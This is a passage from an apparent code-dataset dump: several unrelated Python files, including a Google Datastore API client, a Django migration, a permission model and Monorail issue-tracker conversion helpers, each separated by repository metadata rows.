relative_path=u'v1/{+name}',
request_field='',
request_type_name=u'DatastoreProjectsOperationsGetRequest',
response_type_name=u'GoogleLongrunningOperation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Lists operations that match the specified filter in the request. If the.
server doesn't support this method, it returns `UNIMPLEMENTED`.
NOTE: the `name` binding allows API services to override the binding
to use different resource name schemes, such as `users/*/operations`. To
override the binding, API services can add a binding such as
`"/v1/{name=users/*}/operations"` to their service configuration.
For backwards compatibility, the default name includes the operations
collection id, however overriding users must ensure the name binding
is the parent resource, without the operations collection id.
Args:
request: (DatastoreProjectsOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningListOperationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations',
http_method=u'GET',
method_id=u'datastore.projects.operations.list',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'filter', u'pageSize', u'pageToken'],
relative_path=u'v1/{+name}/operations',
request_field='',
request_type_name=u'DatastoreProjectsOperationsListRequest',
response_type_name=u'GoogleLongrunningListOperationsResponse',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(DatastoreV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
def AllocateIds(self, request, global_params=None):
"""Allocates IDs for the given keys, which is useful for referencing an entity.
before it is inserted.
Args:
request: (DatastoreProjectsAllocateIdsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AllocateIdsResponse) The response message.
"""
config = self.GetMethodConfig('AllocateIds')
return self._RunMethod(
config, request, global_params=global_params)
AllocateIds.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.allocateIds',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:allocateIds',
request_field=u'allocateIdsRequest',
request_type_name=u'DatastoreProjectsAllocateIdsRequest',
response_type_name=u'AllocateIdsResponse',
supports_download=False,
)
def BeginTransaction(self, request, global_params=None):
"""Begins a new transaction.
Args:
request: (DatastoreProjectsBeginTransactionRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BeginTransactionResponse) The response message.
"""
config = self.GetMethodConfig('BeginTransaction')
return self._RunMethod(
config, request, global_params=global_params)
BeginTransaction.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.beginTransaction',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:beginTransaction',
request_field=u'beginTransactionRequest',
request_type_name=u'DatastoreProjectsBeginTransactionRequest',
response_type_name=u'BeginTransactionResponse',
supports_download=False,
)
def Commit(self, request, global_params=None):
"""Commits a transaction, optionally creating, deleting or modifying some.
entities.
Args:
request: (DatastoreProjectsCommitRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitResponse) The response message.
"""
config = self.GetMethodConfig('Commit')
return self._RunMethod(
config, request, global_params=global_params)
Commit.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.commit',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:commit',
request_field=u'commitRequest',
request_type_name=u'DatastoreProjectsCommitRequest',
response_type_name=u'CommitResponse',
supports_download=False,
)
def Export(self, request, global_params=None):
"""Exports a copy of all or a subset of entities from Google Cloud Datastore.
to another storage system, such as Google Cloud Storage. Recent updates to
entities may not be reflected in the export. The export occurs in the
background and its progress can be monitored and managed via the
Operation resource that is created. The output of an export may only be
used once the associated operation is done. If an export operation is
cancelled before completion it may leave partial data behind in Google
Cloud Storage.
Args:
request: (DatastoreProjectsExportRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Export')
return self._RunMethod(
config, request, global_params=global_params)
Export.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.export',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:export',
request_field=u'googleDatastoreAdminV1ExportEntitiesRequest',
request_type_name=u'DatastoreProjectsExportRequest',
response_type_name=u'GoogleLongrunningOperation',
supports_download=False,
)
def Import(self, request, global_params=None):
"""Imports entities into Google Cloud Datastore. Existing entities with the.
same key are overwritten. The import occurs in the background and its
progress can be monitored and managed via the Operation resource that is
created. If an ImportEntities operation is cancelled, it is possible
that a subset of the data has already been imported to Cloud Datastore.
Args:
request: (DatastoreProjectsImportRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Import')
return self._RunMethod(
config, request, global_params=global_params)
Import.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.import',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:import',
request_field=u'googleDatastoreAdminV1ImportEntitiesRequest',
request_type_name=u'DatastoreProjectsImportRequest',
response_type_name=u'GoogleLongrunningOperation',
supports_download=False,
)
def Lookup(self, request, global_params=None):
"""Looks up entities by key.
Args:
request: (DatastoreProjectsLookupRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(LookupResponse) The response message.
"""
config = self.GetMethodConfig('Lookup')
return self._RunMethod(
config, request, global_params=global_params)
Lookup.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.lookup',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:lookup',
request_field=u'lookupRequest',
request_type_name=u'DatastoreProjectsLookupRequest',
response_type_name=u'LookupResponse',
supports_download=False,
)
def ReserveIds(self, request, global_params=None):
"""Prevents the supplied keys' IDs from being auto-allocated by Cloud.
Datastore.
Args:
request: (DatastoreProjectsReserveIdsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ReserveIdsResponse) The response message.
"""
config = self.GetMethodConfig('ReserveIds')
return self._RunMethod(
config, request, global_params=global_params)
ReserveIds.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.reserveIds',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:reserveIds',
request_field=u'reserveIdsRequest',
request_type_name=u'DatastoreProjectsReserveIdsRequest',
response_type_name=u'ReserveIdsResponse',
supports_download=False,
)
def Rollback(self, request, global_params=None):
"""Rolls back a transaction.
Args:
request: (DatastoreProjectsRollbackRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RollbackResponse) The response message.
"""
config = self.GetMethodConfig('Rollback')
return self._RunMethod(
config, request, global_params=global_params)
Rollback.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.rollback',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:rollback',
request_field=u'rollbackRequest',
request_type_name=u'DatastoreProjectsRollbackRequest',
response_type_name=u'RollbackResponse',
supports_download=False,
)
def RunQuery(self, request, global_params=None):
"""Queries for entities.
Args:
request: (DatastoreProjectsRunQueryRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RunQueryResponse) The response message.
"""
config = self.GetMethodConfig('RunQuery')
return self._RunMethod(
config, request, global_params=global_params)
RunQuery.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'datastore.projects.runQuery',
ordered_params=[u'projectId'],
path_params=[u'projectId'],
query_params=[],
relative_path=u'v1/projects/{projectId}:runQuery',
request_field=u'runQueryRequest',
request_type_name=u'DatastoreProjectsRunQueryRequest',
response_type_name=u'RunQueryResponse',
supports_download=False,
)
| [
"saneetk@packtpub.com"
] | saneetk@packtpub.com |
dfcb9af51620932e87402ca302ac7f129e5addfb | 7257d16c3352283a5e0237db74870374531d8e2d | /ch12/ex04.py | a19b3f8d607b9b5924c2782eb3e0a5d35a7c2f83 | [] | no_license | EunhyeKIMM/python | 886703a3ace8c51e4cf00d23ae5d6bfd99cd7e92 | b4de600d9fccdd8f5fbef2a387d63f99610b67ed | refs/heads/master | 2023-02-19T05:12:54.500019 | 2021-01-20T15:49:01 | 2021-01-20T15:49:01 | 329,340,972 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py | import sys
while True:
ans = input('명령>')
if ans == 'quit':
sys.exit(0)
print(ans) | [
"kimeunhye0710@gmail.com"
] | kimeunhye0710@gmail.com |
cae0e6ea55aba796f6f8be2d75ee40d5756d5a32 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /sLb2Fs6aGRQBYAXqQ_11.py | 87b06555ae8f879dd67c342359ad561108009eb4 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | """
Given a Rubik's Cube with a side length of `n`, return the number of
individual stickers that are needed to cover the whole cube.

* The Rubik's cube of side length `1` has **6 stickers**.
* The Rubik's cube of side length `2` has **24 stickers**.
* The Rubik's cube of side length `3` has **54 stickers**.
### Examples
how_many_stickers(1) ➞ 6
how_many_stickers(2) ➞ 24
how_many_stickers(3) ➞ 54
### Notes
* Keep in mind there are six faces to keep track of.
* Expect only positive whole numbers.
"""
def how_many_stickers(n):
return 6*pow(n,2)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
cdbc0a4ed1d136f416ba29f80d6ac70a7f07cf3b | 5b71e2952f34dd3bb20148874d952fee06d31857 | /app/mf/crud/migrations/0068_auto_20210130_1317.py | dd034f797a90346ddce19c87f0439ee92d564331 | [] | no_license | isela1998/facebook | a937917cddb9ef043dd6014efc44d59d034102b1 | a0f2f146eb602b45c951995a5cb44409426250c5 | refs/heads/master | 2023-07-18T02:14:50.293774 | 2021-08-28T03:26:06 | 2021-08-28T03:26:06 | 400,613,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | # Generated by Django 3.1.1 on 2021-01-30 17:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crud', '0067_auto_20210130_1104'),
]
operations = [
migrations.RemoveField(
model_name='sale',
name='type_exchange',
),
migrations.AddField(
model_name='sale',
name='exchange1',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=30, verbose_name='Cambio'),
),
migrations.AddField(
model_name='sale',
name='exchange2',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=30, verbose_name='Cambio'),
),
]
| [
"infantefernandezisela@gmail.com"
] | infantefernandezisela@gmail.com |
a04fd2d3b518817724d9cab376f37c2b71f9a3be | 6c40a17cee8777dbf4e0b6d85e624eacefd67a69 | /ez2pay/models/permission.py | 4d79a47c58bd77bd06ab42d129503eadcdf61164 | [
"MIT"
] | permissive | fangpenlin/ez2pay | ae5125c8c05bad0178d7c8bb0f0c256489e0127a | 13ce4782d3c673a0cb07003a826a10bdfbe6a9ad | refs/heads/master | 2021-05-28T06:01:56.627261 | 2013-12-03T01:46:23 | 2013-12-03T01:46:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,678 | py | from __future__ import unicode_literals
from . import tables
from .base import BaseTableModel
class PermissionModel(BaseTableModel):
"""Permission data model
"""
TABLE = tables.Permission
def get_by_name(self, permission_name):
"""Get a permission by name
"""
permission = (
self.session
.query(tables.Permission)
.filter_by(permission_name=permission_name)
.first()
)
return permission
def create(
self,
permission_name,
description=None,
):
"""Create a new permission and return its id
"""
permission = tables.Permission(
permission_name=unicode(permission_name),
description=unicode(description) if description is not None else None,
)
self.session.add(permission)
# flush the change, so we can get real id
self.session.flush()
assert permission.permission_id is not None, \
'Permission id should not be none here'
permission_id = permission.permission_id
self.logger.info('Create permission %s', permission_name)
return permission_id
def update_permission(self, permission_id, **kwargs):
"""Update attributes of a permission
"""
permission = self.get(permission_id, raise_error=True)
if 'description' in kwargs:
permission.description = kwargs['description']
if 'permission_name' in kwargs:
permission.permission_name = kwargs['permission_name']
self.session.add(permission)
| [
"bornstub@gmail.com"
] | bornstub@gmail.com |
9114b0a4d64ffaa928a2b6eca362492c7d4d3a45 | a034d4ba39789e4a351112c46dd04a38180cd06c | /appengine/monorail/services/api_pb2_v1_helpers.py | b67a0d604e05fada9d917b76f008ffec195dcc55 | [
"BSD-3-Clause"
] | permissive | asdfghjjklllllaaa/infra | 050ad249ab44f264b4e2080aa9537ce74aafb022 | 8f63af54e46194cd29291813f2790ff6e986804d | refs/heads/master | 2023-01-10T21:55:44.811835 | 2019-07-01T14:03:32 | 2019-07-01T14:03:32 | 194,691,941 | 1 | 0 | BSD-3-Clause | 2023-01-07T07:12:37 | 2019-07-01T14:45:29 | Python | UTF-8 | Python | false | false | 23,394 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Convert Monorail PB objects to API PB objects"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import datetime
import logging
import time
from businesslogic import work_env
from framework import exceptions
from framework import framework_constants
from framework import framework_helpers
from framework import framework_views
from framework import permissions
from framework import timestr
from proto import api_pb2_v1
from proto import project_pb2
from proto import tracker_pb2
from services import project_svc
from tracker import field_helpers
from tracker import tracker_bizobj
from tracker import tracker_helpers
def convert_project(project, config, role, templates):
"""Convert Monorail Project PB to API ProjectWrapper PB."""
return api_pb2_v1.ProjectWrapper(
kind='monorail#project',
name=project.project_name,
externalId=project.project_name,
htmlLink='/p/%s/' % project.project_name,
summary=project.summary,
description=project.description,
role=role,
issuesConfig=convert_project_config(config, templates))
def convert_project_config(config, templates):
"""Convert Monorail ProjectIssueConfig PB to API ProjectIssueConfig PB."""
return api_pb2_v1.ProjectIssueConfig(
kind='monorail#projectIssueConfig',
restrictToKnown=config.restrict_to_known,
defaultColumns=config.default_col_spec.split(),
defaultSorting=config.default_sort_spec.split(),
statuses=[convert_status(s) for s in config.well_known_statuses],
labels=[convert_label(l) for l in config.well_known_labels],
prompts=[convert_template(t) for t in templates],
defaultPromptForMembers=config.default_template_for_developers,
defaultPromptForNonMembers=config.default_template_for_users)
def convert_status(status):
"""Convert Monorail StatusDef PB to API Status PB."""
return api_pb2_v1.Status(
status=status.status,
meansOpen=status.means_open,
description=status.status_docstring)
def convert_label(label):
"""Convert Monorail LabelDef PB to API Label PB."""
return api_pb2_v1.Label(
label=label.label,
description=label.label_docstring)
def convert_template(template):
"""Convert Monorail TemplateDef PB to API Prompt PB."""
return api_pb2_v1.Prompt(
name=template.name,
title=template.summary,
description=template.content,
titleMustBeEdited=template.summary_must_be_edited,
status=template.status,
labels=template.labels,
membersOnly=template.members_only,
defaultToMember=template.owner_defaults_to_member,
componentRequired=template.component_required)
def convert_person(user_id, cnxn, services, trap_exception=False):
"""Convert user id to API AtomPerson PB or None if user_id is None."""
if not user_id:
# convert_person should handle 'converting' optional user values,
# like issue.owner, where user_id may be None.
return None
if user_id == framework_constants.DELETED_USER_ID:
return api_pb2_v1.AtomPerson(
kind='monorail#issuePerson',
name=framework_constants.DELETED_USER_NAME)
try:
user = services.user.GetUser(cnxn, user_id)
except exceptions.NoSuchUserException as ex:
if trap_exception:
logging.warning(str(ex))
return None
else:
raise ex
days_ago = None
if user.last_visit_timestamp:
secs_ago = int(time.time()) - user.last_visit_timestamp
days_ago = secs_ago // framework_constants.SECS_PER_DAY
return api_pb2_v1.AtomPerson(
kind='monorail#issuePerson',
name=user.email,
htmlLink='https://%s/u/%d' % (framework_helpers.GetHostPort(), user_id),
last_visit_days_ago=days_ago,
email_bouncing=bool(user.email_bounce_timestamp),
vacation_message=user.vacation_message)
def convert_issue_ids(issue_ids, mar, services):
"""Convert global issue ids to API IssueRef PB."""
# missed issue ids are filtered out.
issues = services.issue.GetIssues(mar.cnxn, issue_ids)
result = []
for issue in issues:
issue_ref = api_pb2_v1.IssueRef(
issueId=issue.local_id,
projectId=issue.project_name,
kind='monorail#issueRef')
result.append(issue_ref)
return result
def convert_issueref_pbs(issueref_pbs, mar, services):
"""Convert API IssueRef PBs to global issue ids."""
if issueref_pbs:
result = []
for ir in issueref_pbs:
project_id = mar.project_id
if ir.projectId:
project = services.project.GetProjectByName(
mar.cnxn, ir.projectId)
if project:
project_id = project.project_id
try:
issue = services.issue.GetIssueByLocalID(
mar.cnxn, project_id, ir.issueId)
result.append(issue.issue_id)
except exceptions.NoSuchIssueException:
logging.warning(
'Issue (%s:%d) does not exist.' % (ir.projectId, ir.issueId))
return result
else:
return None
def convert_approvals(cnxn, approval_values, services, config, phases):
"""Convert an Issue's Monorail ApprovalValue PBs to API Approval"""
fds_by_id = {fd.field_id: fd for fd in config.field_defs}
phases_by_id = {phase.phase_id: phase for phase in phases}
approvals = []
for av in approval_values:
approval_fd = fds_by_id.get(av.approval_id)
if approval_fd is None:
logging.warning(
'Approval (%d) does not exist' % av.approval_id)
continue
if approval_fd.field_type is not tracker_pb2.FieldTypes.APPROVAL_TYPE:
logging.warning(
'field %s has unexpected field_type: %s' % (
approval_fd.field_name, approval_fd.field_type.name))
continue
approval = api_pb2_v1.Approval()
approval.approvalName = approval_fd.field_name
approvers = [convert_person(approver_id, cnxn, services)
for approver_id in av.approver_ids]
approval.approvers = [approver for approver in approvers if approver]
approval.status = api_pb2_v1.ApprovalStatus(av.status.number)
if av.setter_id:
approval.setter = convert_person(av.setter_id, cnxn, services)
if av.set_on:
approval.setOn = datetime.datetime.fromtimestamp(av.set_on)
if av.phase_id:
try:
approval.phaseName = phases_by_id[av.phase_id].name
except KeyError:
logging.warning('phase %d not found in given phases list' % av.phase_id)
approvals.append(approval)
return approvals
def convert_phases(phases):
"""Convert an Issue's Monorail Phase PBs to API Phase."""
converted_phases = []
for idx, phase in enumerate(phases):
if not phase.name:
try:
logging.warning(
'Phase %d has no name, skipping conversion.' % phase.phase_id)
except TypeError:
logging.warning(
'Phase #%d (%s) has no name or id, skipping conversion.' % (
idx, phase))
continue
converted = api_pb2_v1.Phase(phaseName=phase.name, rank=phase.rank)
converted_phases.append(converted)
return converted_phases
def convert_issue(cls, issue, mar, services):
"""Convert Monorail Issue PB to API IssuesGetInsertResponse."""
config = services.config.GetProjectConfig(mar.cnxn, issue.project_id)
granted_perms = tracker_bizobj.GetGrantedPerms(
issue, mar.auth.effective_ids, config)
issue_project = services.project.GetProject(mar.cnxn, issue.project_id)
component_list = []
for cd in config.component_defs:
cid = cd.component_id
if cid in issue.component_ids:
component_list.append(cd.path)
cc_list = [convert_person(p, mar.cnxn, services) for p in issue.cc_ids]
cc_list = [p for p in cc_list if p is not None]
field_values_list = []
fds_by_id = {
fd.field_id: fd for fd in config.field_defs}
phases_by_id = {phase.phase_id: phase for phase in issue.phases}
for fv in issue.field_values:
fd = fds_by_id.get(fv.field_id)
if not fd:
logging.warning('Custom field %d of project %s does not exist',
fv.field_id, issue_project.project_name)
continue
val = None
if fv.user_id:
val = _get_user_email(
services.user, mar.cnxn, fv.user_id)
else:
val = tracker_bizobj.GetFieldValue(fv, {})
if not isinstance(val, basestring):
val = str(val)
new_fv = api_pb2_v1.FieldValue(
fieldName=fd.field_name,
fieldValue=val,
derived=fv.derived)
if fd.approval_id: # Attach parent approval name
approval_fd = fds_by_id.get(fd.approval_id)
if not approval_fd:
logging.warning('Parent approval field %d of field %s does not exist',
fd.approval_id, fd.field_name)
else:
new_fv.approvalName = approval_fd.field_name
elif fv.phase_id: # Attach phase name
phase = phases_by_id.get(fv.phase_id)
if not phase:
logging.warning('Phase %d for field %s does not exist',
fv.phase_id, fd.field_name)
else:
new_fv.phaseName = phase.name
field_values_list.append(new_fv)
approval_values_list = convert_approvals(
mar.cnxn, issue.approval_values, services, config, issue.phases)
phases_list = convert_phases(issue.phases)
with work_env.WorkEnv(mar, services) as we:
starred = we.IsIssueStarred(issue)
resp = cls(
kind='monorail#issue',
id=issue.local_id,
title=issue.summary,
summary=issue.summary,
projectId=issue_project.project_name,
stars=issue.star_count,
starred=starred,
status=issue.status,
state=(api_pb2_v1.IssueState.open if
tracker_helpers.MeansOpenInProject(
tracker_bizobj.GetStatus(issue), config)
else api_pb2_v1.IssueState.closed),
labels=issue.labels,
components=component_list,
author=convert_person(issue.reporter_id, mar.cnxn, services),
owner=convert_person(issue.owner_id, mar.cnxn, services),
cc=cc_list,
updated=datetime.datetime.fromtimestamp(issue.modified_timestamp),
published=datetime.datetime.fromtimestamp(issue.opened_timestamp),
blockedOn=convert_issue_ids(issue.blocked_on_iids, mar, services),
blocking=convert_issue_ids(issue.blocking_iids, mar, services),
canComment=permissions.CanCommentIssue(
mar.auth.effective_ids, mar.perms, issue_project, issue,
granted_perms=granted_perms),
canEdit=permissions.CanEditIssue(
mar.auth.effective_ids, mar.perms, issue_project, issue,
granted_perms=granted_perms),
fieldValues=field_values_list,
approvalValues=approval_values_list,
phases=phases_list
)
if issue.closed_timestamp > 0:
resp.closed = datetime.datetime.fromtimestamp(issue.closed_timestamp)
if issue.merged_into:
resp.mergedInto=convert_issue_ids([issue.merged_into], mar, services)[0]
if issue.owner_modified_timestamp:
resp.owner_modified = datetime.datetime.fromtimestamp(
issue.owner_modified_timestamp)
if issue.status_modified_timestamp:
resp.status_modified = datetime.datetime.fromtimestamp(
issue.status_modified_timestamp)
if issue.component_modified_timestamp:
resp.component_modified = datetime.datetime.fromtimestamp(
issue.component_modified_timestamp)
return resp
def convert_comment(issue, comment, mar, services, granted_perms):
"""Convert Monorail IssueComment PB to API IssueCommentWrapper."""
perms = permissions.UpdateIssuePermissions(
mar.perms, mar.project, issue, mar.auth.effective_ids,
granted_perms=granted_perms)
commenter = services.user.GetUser(mar.cnxn, comment.user_id)
can_delete = permissions.CanDeleteComment(
comment, commenter, mar.auth.user_id, perms)
return api_pb2_v1.IssueCommentWrapper(
attachments=[convert_attachment(a) for a in comment.attachments],
author=convert_person(comment.user_id, mar.cnxn, services,
trap_exception=True),
canDelete=can_delete,
content=comment.content,
deletedBy=convert_person(comment.deleted_by, mar.cnxn, services,
trap_exception=True),
id=comment.sequence,
published=datetime.datetime.fromtimestamp(comment.timestamp),
updates=convert_amendments(issue, comment.amendments, mar, services),
kind='monorail#issueComment',
is_description=comment.is_description)
def convert_approval_comment(issue, comment, mar, services, granted_perms):
perms = permissions.UpdateIssuePermissions(
mar.perms, mar.project, issue, mar.auth.effective_ids,
granted_perms=granted_perms)
commenter = services.user.GetUser(mar.cnxn, comment.user_id)
can_delete = permissions.CanDeleteComment(
comment, commenter, mar.auth.user_id, perms)
return api_pb2_v1.ApprovalCommentWrapper(
attachments=[convert_attachment(a) for a in comment.attachments],
author=convert_person(
comment.user_id, mar.cnxn, services, trap_exception=True),
canDelete=can_delete,
content=comment.content,
deletedBy=convert_person(comment.deleted_by, mar.cnxn, services,
trap_exception=True),
id=comment.sequence,
published=datetime.datetime.fromtimestamp(comment.timestamp),
approvalUpdates=convert_approval_amendments(
comment.amendments, mar, services),
kind='monorail#approvalComment',
is_description=comment.is_description)
def convert_attachment(attachment):
"""Convert Monorail Attachment PB to API Attachment."""
return api_pb2_v1.Attachment(
attachmentId=attachment.attachment_id,
fileName=attachment.filename,
fileSize=attachment.filesize,
mimetype=attachment.mimetype,
isDeleted=attachment.deleted)
def convert_amendments(issue, amendments, mar, services):
"""Convert a list of Monorail Amendment PBs to API Update."""
amendments_user_ids = tracker_bizobj.UsersInvolvedInAmendments(amendments)
users_by_id = framework_views.MakeAllUserViews(
mar.cnxn, services.user, amendments_user_ids)
framework_views.RevealAllEmailsToMembers(mar.auth, mar.project, users_by_id)
result = api_pb2_v1.Update(kind='monorail#issueCommentUpdate')
for amendment in amendments:
if amendment.field == tracker_pb2.FieldID.SUMMARY:
result.summary = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.STATUS:
result.status = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.OWNER:
if len(amendment.added_user_ids) == 0:
result.owner = framework_constants.NO_USER_NAME
else:
result.owner = _get_user_email(
services.user, mar.cnxn, amendment.added_user_ids[0])
elif amendment.field == tracker_pb2.FieldID.LABELS:
result.labels = amendment.newvalue.split()
elif amendment.field == tracker_pb2.FieldID.CC:
for user_id in amendment.added_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.cc.append(user_email)
for user_id in amendment.removed_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.cc.append('-%s' % user_email)
elif amendment.field == tracker_pb2.FieldID.BLOCKEDON:
result.blockedOn = _append_project(
amendment.newvalue, issue.project_name)
elif amendment.field == tracker_pb2.FieldID.BLOCKING:
result.blocking = _append_project(
amendment.newvalue, issue.project_name)
elif amendment.field == tracker_pb2.FieldID.MERGEDINTO:
result.mergedInto = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.COMPONENTS:
result.components = amendment.newvalue.split()
elif amendment.field == tracker_pb2.FieldID.CUSTOM:
fv = api_pb2_v1.FieldValue()
fv.fieldName = amendment.custom_field_name
fv.fieldValue = tracker_bizobj.AmendmentString(amendment, users_by_id)
result.fieldValues.append(fv)
return result
def convert_approval_amendments(amendments, mar, services):
"""Convert a list of Monorail Amendment PBs API ApprovalUpdate."""
amendments_user_ids = tracker_bizobj.UsersInvolvedInAmendments(amendments)
users_by_id = framework_views.MakeAllUserViews(
mar.cnxn, services.user, amendments_user_ids)
framework_views.RevealAllEmailsToMembers(mar.auth, mar.project, users_by_id)
result = api_pb2_v1.ApprovalUpdate(kind='monorail#approvalCommentUpdate')
for amendment in amendments:
if amendment.field == tracker_pb2.FieldID.CUSTOM:
if amendment.custom_field_name == 'Status':
status_number = tracker_pb2.ApprovalStatus(
amendment.newvalue.upper()).number
result.status = api_pb2_v1.ApprovalStatus(status_number).name
elif amendment.custom_field_name == 'Approvers':
for user_id in amendment.added_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.approvers.append(user_email)
for user_id in amendment.removed_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.approvers.append('-%s' % user_email)
else:
fv = api_pb2_v1.FieldValue()
fv.fieldName = amendment.custom_field_name
fv.fieldValue = tracker_bizobj.AmendmentString(amendment, users_by_id)
# TODO(jojwang): monorail:4229, add approvalName field to FieldValue
result.fieldValues.append(fv)
return result
def _get_user_email(user_service, cnxn, user_id):
"""Get user email."""
if user_id == framework_constants.DELETED_USER_ID:
return framework_constants.DELETED_USER_NAME
if not user_id:
# _get_user_email should handle getting emails for optional user values,
# like issue.owner where user_id may be None.
# TODO(jojwang): monorail:5740, this should return USER_NOT_FOUND.
return framework_constants.DELETED_USER_NAME
try:
user_email = user_service.LookupUserEmail(
cnxn, user_id)
except exceptions.NoSuchUserException:
user_email = framework_constants.USER_NOT_FOUND_NAME
return user_email
def _append_project(issue_ids, project_name):
"""Append project name to convert <id> to <project>:<id> format."""
result = []
id_list = issue_ids.split()
for id_str in id_list:
if ':' in id_str:
result.append(id_str)
# '-' means this issue is being removed
elif id_str.startswith('-'):
result.append('-%s:%s' % (project_name, id_str[1:]))
else:
result.append('%s:%s' % (project_name, id_str))
return result
def split_remove_add(item_list):
"""Split one list of items into two: items to add and items to remove."""
list_to_add = []
list_to_remove = []
for item in item_list:
if item.startswith('-'):
list_to_remove.append(item[1:])
else:
list_to_add.append(item)
return list_to_add, list_to_remove
# TODO(sheyang): batch the SQL queries to fetch projects/issues.
def issue_global_ids(project_local_id_pairs, project_id, mar, services):
"""Find global issues ids given <project_name>:<issue_local_id> pairs."""
result = []
for pair in project_local_id_pairs:
issue_project_id = None
local_id = None
if ':' in pair:
pair_ary = pair.split(':')
project_name = pair_ary[0]
local_id = int(pair_ary[1])
project = services.project.GetProjectByName(mar.cnxn, project_name)
if not project:
raise exceptions.NoSuchProjectException(
'Project %s does not exist' % project_name)
issue_project_id = project.project_id
else:
issue_project_id = project_id
local_id = int(pair)
result.append(
services.issue.LookupIssueID(mar.cnxn, issue_project_id, local_id))
return result
def convert_group_settings(group_name, setting):
"""Convert UserGroupSettings to UserGroupSettingsWrapper."""
return api_pb2_v1.UserGroupSettingsWrapper(
groupName=group_name,
who_can_view_members=setting.who_can_view_members,
ext_group_type=setting.ext_group_type,
last_sync_time=setting.last_sync_time)
def convert_component_def(cd, mar, services):
"""Convert ComponentDef PB to Component PB."""
project_name = services.project.LookupProjectNames(
mar.cnxn, [cd.project_id])[cd.project_id]
user_ids = set()
user_ids.update(
cd.admin_ids + cd.cc_ids + [cd.creator_id] + [cd.modifier_id])
user_names_dict = services.user.LookupUserEmails(mar.cnxn, list(user_ids))
component = api_pb2_v1.Component(
componentId=cd.component_id,
projectName=project_name,
componentPath=cd.path,
description=cd.docstring,
admin=sorted([user_names_dict[uid] for uid in cd.admin_ids]),
cc=sorted([user_names_dict[uid] for uid in cd.cc_ids]),
deprecated=cd.deprecated)
if cd.created:
component.created = datetime.datetime.fromtimestamp(cd.created)
component.creator = user_names_dict[cd.creator_id]
if cd.modified:
component.modified = datetime.datetime.fromtimestamp(cd.modified)
component.modifier = user_names_dict[cd.modifier_id]
return component
def convert_component_ids(config, component_names):
"""Convert a list of component names to ids."""
component_names_lower = [name.lower() for name in component_names]
